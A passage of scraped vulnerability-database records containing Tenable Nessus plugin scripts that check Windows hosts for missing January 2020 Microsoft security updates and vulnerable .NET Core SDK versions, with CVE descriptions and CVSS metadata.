(January 2020)\");\n script_summary(english:\"Checks for Windows Install of .NET Core SDK.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple .NET Core SDK vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft .NET Core SDK installation on the remote host is version 2.1.x < 2.1.511 or 2.1.608, 3.0.x < 3.0.102, or\n3.1.x < 3.1.101. It is, therefore, affected by multiple vulnerabilities:\n\n - A denial of service vulnerability exists when ASP.NET Core improperly handles web requests. An attacker who\n successfully exploited this vulnerability could cause a denial of service against an ASP.NET Core web application.\n The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could\n exploit this vulnerability by issuing specially crafted requests to the ASP.NET Core application. (CVE-2020-0602)\n\n - A remote code execution vulnerability exists in ASP.NET Core software when the software fails to handle objects in\n memory. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the\n current user. If the current user is logged on with administrative user rights, an attacker could take control of\n the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts\n with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less\n impacted than users who operate with administrative user rights. (CVE-2020-0603)\n\n - A remote code execution vulnerability exists in .NET software when the software fails to check the source markup of\n a file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the\n current user. If the current user is logged on with administrative user rights, an attacker could take control of\n the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts\n with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less\n impacted than users who operate with administrative user rights. (CVE-2020-0605, CVE-2020-0606)\");\n # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0605\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4e287012\");\n # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0606\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fa0a6c3c\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/dotnet/announcements/issues/148\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/dotnet/announcements/issues/149\");\n # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0602\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?530ba67f\");\n # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0603\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?374d2043\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/aspnet/Announcements/issues/402\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/aspnet/Announcements/issues/403\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/dotnet/aspnetcore/issues/18336\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/dotnet/aspnetcore/issues/18337\");\n script_set_attribute(attribute:\"solution\", value:\n\"Refer to vendor documentation.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0606\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/16\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:.net_core\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"microsoft_dotnet_core_sdk_win.nbin\");\n script_require_keys(\"installed_sw/.NET Core SDK Windows\", \"Settings/ParanoidReport\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\napp = '.NET Core SDK Windows';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\nconstraints = [\n { 'min_version' : '2.1', 'fixed_version' : '2.1.511' },\n { 'min_version' : '2.1.600', 'fixed_version' : '2.1.608'},\n { 'min_version' : '3.0.0', 'fixed_version' : '3.0.102' },\n { 'min_version' : '3.1.0', 'fixed_version' : '3.1.101' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T15:25:32", "description": "The remote Windows host is missing security update 4534312 or cumulative update 4534303. It is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists in the Windows Common Log File System (CLFS) driver when it fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could potentially read data that was not intended to be disclosed. Note that this vulnerability would not allow an attacker to execute code or to elevate their user rights directly, but it could be used to obtain information that could be used to try to further compromise the affected system. (CVE-2020-0615, CVE-2020-0639)\n\n - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0642)\n\n - A remote code execution vulnerability exists in .NET software when the software fails to check the source markup of a file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - An elevation of privilege vulnerability exists in Microsoft Windows when Windows fails to properly handle certain symbolic links. An attacker who successfully exploited this vulnerability could potentially set certain items to run at a higher level and thereby elevate permissions. (CVE-2020-0635)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface Plus (GDI+) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2020-0643)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0608)\n\n - An elevation of privilege vulnerability exists when Microsoft Cryptographic Services improperly handles files. An attacker could exploit the vulnerability to overwrite or modify a protected file leading to a privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists when the Windows Common Log File System (CLFS) driver improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Search Indexer handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0625, CVE-2020-0626, CVE-2020-0627, CVE-2020-0628, CVE-2020-0629, CVE-2020-0630, CVE-2020-0631, CVE-2020-0632)\n\n - A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0640)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-01-14T00:00:00", "type": "nessus", "title": "KB4534312: Windows Server 2008 January 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0605", "CVE-2020-0606", "CVE-2020-0608", "CVE-2020-0615", "CVE-2020-0620", "CVE-2020-0625", "CVE-2020-0626", "CVE-2020-0627", "CVE-2020-0628", "CVE-2020-0629", "CVE-2020-0630", "CVE-2020-0631", "CVE-2020-0632", "CVE-2020-0634", "CVE-2020-0635", "CVE-2020-0639", "CVE-2020-0640", "CVE-2020-0642", "CVE-2020-0643", "CVE-2020-0646"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_JAN_4534303.NASL", "href": "https://www.tenable.com/plugins/nessus/132864", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\n\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132864);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\n \"CVE-2020-0605\",\n \"CVE-2020-0606\",\n \"CVE-2020-0608\",\n \"CVE-2020-0615\",\n \"CVE-2020-0620\",\n \"CVE-2020-0625\",\n \"CVE-2020-0626\",\n \"CVE-2020-0627\",\n \"CVE-2020-0628\",\n \"CVE-2020-0629\",\n \"CVE-2020-0630\",\n \"CVE-2020-0631\",\n \"CVE-2020-0632\",\n \"CVE-2020-0634\",\n \"CVE-2020-0635\",\n \"CVE-2020-0639\",\n \"CVE-2020-0640\",\n \"CVE-2020-0642\",\n \"CVE-2020-0643\",\n \"CVE-2020-0646\"\n );\n script_xref(name:\"MSKB\", value:\"4534312\");\n script_xref(name:\"MSKB\", value:\"4534303\");\n script_xref(name:\"MSFT\", value:\"MS20-4534312\");\n script_xref(name:\"MSFT\", value:\"MS20-4534303\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"KB4534312: Windows Server 2008 January 2020 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4534312\nor cumulative update 4534303. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An information disclosure vulnerability exists in the\n Windows Common Log File System (CLFS) driver when it\n fails to properly handle objects in memory. An attacker\n who successfully exploited this vulnerability could\n potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2020-0615,\n CVE-2020-0639)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0642)\n\n - A remote code execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when Windows fails to properly handle\n certain symbolic links. An attacker who successfully\n exploited this vulnerability could potentially set\n certain items to run at a higher level and thereby\n elevate permissions. (CVE-2020-0635)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface Plus\n (GDI+) handles objects in memory, allowing an attacker\n to retrieve information from a targeted system. By\n itself, the information disclosure does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability. (CVE-2020-0643)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0608)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Cryptographic Services improperly handles\n files. An attacker could exploit the vulnerability to\n overwrite or modify a protected file leading to a\n privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-0625, CVE-2020-0626,\n CVE-2020-0627, CVE-2020-0628, CVE-2020-0629,\n CVE-2020-0630, CVE-2020-0631, CVE-2020-0632)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0640)\");\n # https://support.microsoft.com/en-us/help/4534312/windows-server-2008-update-kb4534312\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8064e787\");\n # https://support.microsoft.com/en-us/help/4534303/windows-server-2008-update-kb4534303\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6d835d75\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4534312 or Cumulative Update KB4534303.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0646\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint Workflows XOML Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-01\";\nkbs = make_list('4534303', '4534312');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.0\",\n sp:2,\n rollup_date:\"01_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4534303, 4534312])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T15:24:48", "description": "The remote Windows host is missing security update 4534314 or cumulative update 4534310. It is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists when Remote Desktop Web Access improperly handles credential information. An attacker who successfully exploited this vulnerability could obtain legitimate users' credentials. (CVE-2020-0637)\n\n - An information disclosure vulnerability exists in the Windows Common Log File System (CLFS) driver when it fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could potentially read data that was not intended to be disclosed. Note that this vulnerability would not allow an attacker to execute code or to elevate their user rights directly, but it could be used to obtain information that could be used to try to further compromise the affected system. (CVE-2020-0615, CVE-2020-0639)\n\n - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0642)\n\n - A remote code execution vulnerability exists in .NET software when the software fails to check the source markup of a file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - An elevation of privilege vulnerability exists in Microsoft Windows when Windows fails to properly handle certain symbolic links. An attacker who successfully exploited this vulnerability could potentially set certain items to run at a higher level and thereby elevate permissions. (CVE-2020-0635)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface Plus (GDI+) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2020-0643)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0640)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0608)\n\n - An elevation of privilege vulnerability exists when Microsoft Cryptographic Services improperly handles files. An attacker could exploit the vulnerability to overwrite or modify a protected file leading to a privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists when the Windows Common Log File System (CLFS) driver improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Search Indexer handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0625, CVE-2020-0626, CVE-2020-0627, CVE-2020-0628, CVE-2020-0629, CVE-2020-0630, CVE-2020-0631, CVE-2020-0632)\n\n - An information disclosure vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could obtain information that could be useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists in the Windows Remote Desktop Client when a user connects to a malicious server. An attacker who successfully exploited this vulnerability could execute arbitrary code on the computer of the connecting client. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0611)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-01-14T00:00:00", "type": "nessus", "title": "KB4534314: Windows 7 and Windows Server 2008 R2 January 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0605", "CVE-2020-0606", "CVE-2020-0607", "CVE-2020-0608", "CVE-2020-0611", "CVE-2020-0615", "CVE-2020-0620", "CVE-2020-0625", "CVE-2020-0626", "CVE-2020-0627", "CVE-2020-0628", "CVE-2020-0629", "CVE-2020-0630", "CVE-2020-0631", "CVE-2020-0632", "CVE-2020-0634", "CVE-2020-0635", "CVE-2020-0637", "CVE-2020-0639", "CVE-2020-0640", "CVE-2020-0642", "CVE-2020-0643", "CVE-2020-0646"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_JAN_4534310.NASL", "href": "https://www.tenable.com/plugins/nessus/132866", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\n\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132866);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\n \"CVE-2020-0605\",\n \"CVE-2020-0606\",\n \"CVE-2020-0607\",\n \"CVE-2020-0608\",\n \"CVE-2020-0611\",\n \"CVE-2020-0615\",\n \"CVE-2020-0620\",\n \"CVE-2020-0625\",\n \"CVE-2020-0626\",\n \"CVE-2020-0627\",\n \"CVE-2020-0628\",\n \"CVE-2020-0629\",\n \"CVE-2020-0630\",\n \"CVE-2020-0631\",\n \"CVE-2020-0632\",\n \"CVE-2020-0634\",\n \"CVE-2020-0635\",\n \"CVE-2020-0637\",\n \"CVE-2020-0639\",\n \"CVE-2020-0640\",\n \"CVE-2020-0642\",\n \"CVE-2020-0643\",\n \"CVE-2020-0646\"\n );\n script_xref(name:\"MSKB\", value:\"4534310\");\n script_xref(name:\"MSKB\", value:\"4534314\");\n script_xref(name:\"MSFT\", value:\"MS20-4534310\");\n script_xref(name:\"MSFT\", value:\"MS20-4534314\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"KB4534314: Windows 7 and Windows Server 2008 R2 January 2020 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4534314\nor cumulative update 4534310. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An information disclosure vulnerability exists when\n Remote Desktop Web Access improperly handles credential\n information. An attacker who successfully exploited this\n vulnerability could obtain legitimate users'\n credentials. (CVE-2020-0637)\n\n - An information disclosure vulnerability exists in the\n Windows Common Log File System (CLFS) driver when it\n fails to properly handle objects in memory. An attacker\n who successfully exploited this vulnerability could\n potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2020-0615,\n CVE-2020-0639)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0642)\n\n - A remote code execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when Windows fails to properly handle\n certain symbolic links. An attacker who successfully\n exploited this vulnerability could potentially set\n certain items to run at a higher level and thereby\n elevate permissions. (CVE-2020-0635)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface Plus\n (GDI+) handles objects in memory, allowing an attacker\n to retrieve information from a targeted system. By\n itself, the information disclosure does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability. (CVE-2020-0643)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0640)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0608)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Cryptographic Services improperly handles\n files. An attacker could exploit the vulnerability to\n overwrite or modify a protected file leading to a\n privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-0625, CVE-2020-0626,\n CVE-2020-0627, CVE-2020-0628, CVE-2020-0629,\n CVE-2020-0630, CVE-2020-0631, CVE-2020-0632)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information that could be\n useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0611)\");\n # https://support.microsoft.com/en-us/help/4534310/windows-7-update-kb4534310\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5bc50ca4\");\n # https://support.microsoft.com/en-us/help/4534314/windows-7-update-kb4534314\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8d29d5dd\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4534314 or Cumulative Update KB4534310.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0646\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint Workflows XOML Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-01\";\nkbs = make_list('4534310', '4534314');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = 